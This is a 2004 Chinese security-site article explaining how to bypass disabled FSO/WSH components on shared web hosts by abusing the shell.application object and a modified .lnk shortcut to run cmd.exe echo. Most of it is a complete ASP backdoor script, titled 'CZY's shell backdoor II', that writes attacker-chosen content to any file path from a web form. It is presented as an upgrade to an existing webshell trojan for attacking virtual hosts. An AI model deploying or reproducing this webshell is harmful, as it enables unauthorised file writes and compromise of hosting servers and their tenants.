首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
跨越FSO,WSH写文件
来源:vfocus.net 作者:czy 发布时间:2004-03-18  

跨越FSO,WSH写文件

czy
海洋木马想必各位都用过了吧,这个木马里调用的shell.application对象
对于很多虚拟主机来说几乎是必杀。这部份的代码最早是我写出来的,当初写代码的时
候主要是想证明一下shell.application对象对于虚拟主机的破坏性,所以在实用性上没
有做过多的考虑。
现在把代码也"升级"一下,以实现了文件的写入,因为对于禁用了FSO,WSH的主机来说
写文件的确是一个难事. 你也许会问shell对象有写文件的功能吗?的确在MSDN中
并没有介绍,但是shell对象可以对已存在的LNK/URL/PIF文件进行更改,并且更改后可以保存为
别的文件名.
只能写LNK文件有用吗?这儿我们如果再使用shell对象的invokeverb方法来执行这个LNK
文件的话那我们不就能写任意文件了!为什么?因为LNK文件中指定的执行程序是可以加参数的
那么我们就可以调用cmd 的echo功能来写文件.
好思路在这儿了,编程中遇到的实际问题如下:
1.要找到一个everyone可以仿问的LNK文件。找了一下发现:
"C:\Documents and Settings\Default User\「开始」菜单\程序\附件"目录下的默认LNK文件everyone
用户都默认具有读取权限.

2.利用cmd.exe /c echo来写件的时候">","<",双引号,"&"等有特殊意义不能直接写入必须在它们的前面
使用转义符^.另外双引号在vb中也有特殊意义只有用chr(34)来代替.

<%
path=trim(Request.querystring("path"))
text=trim(Request.querystring("text"))
if text<>"" and path<>"" then
text=replace(text,">","^>")
text=replace(text,"<","^<")
text=replace(text,"&","^&")
text=replace(text,chr(34),"^"&chr(34))

set shell=server.createobject("shell.application")
set shellfolder=shell.namespace("C:\Documents and Settings\Default User\「开始」菜单\程序\附件")
set shellfolderitem=shellfolder.parsename("记事本.lnk")
set objshelllink =shellfolderitem.getlink
objshelllink.path="cmd.exe"
objshelllink.arguments="/c echo "&text&">"&path&" &&del c:\a.lnk"
objshelllink.save("c:\a.lnk")
shell.namespace("c:\").items.item("a.lnk").invokeverb
end if
%>
<html>
<title>CZY's shell backdoor Ⅱ</title>
<form action=shell2.asp>
路径与文件名:<input type=text name=path size=40><p>
文件内容:<textarea name=text rows=20 cols=50 ></textarea><p>
<input type=submit value=生成文件>
</form>
</html>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·PHP配置漏洞攻击
·绕过Windows Rootkit检测系统
·挂钩Windows API
·入侵www.cnwill.com
·Discuz!跨站大全
·在NT系列操作系统里让自己“消失
·Hook 系统服务隐藏端口
·入侵日记一则(CPB论坛注入攻击)
·再谈突破各种防火墙的防护
·用expect写的bbs猜密码工具
·建造永不被杀的80端口后门
·菜鸟学习SQL注射最容易简洁的方
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved